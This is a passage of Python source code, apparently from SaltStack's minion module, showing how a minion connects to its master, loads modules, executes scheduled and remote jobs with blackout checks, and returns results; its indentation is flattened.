self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
        This method should be used as a threading target; it starts the
        actual minion-side execution of a multi-function job.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
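        # With multifunc_ordered enabled the results are positional lists
        # (index i corresponds to data['fun'][i]); otherwise they are dicts
        # keyed by function name.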
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
                        retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
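        # A syndic return ('_syndic_return') bundles per-minion results under
        # load['return'], while a regular minion return copies the ret data
        # directly into the load.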
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
                    'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
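        # On a request timeout we only log a warning; returning True from the
        # handler lets the async stack context treat the exception as handled.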
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
        Create a scheduled job that periodically fires a grains_refresh event,
        so that a change in this minion's grains triggers a pillar refresh
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
        Refresh the beacons.
'''
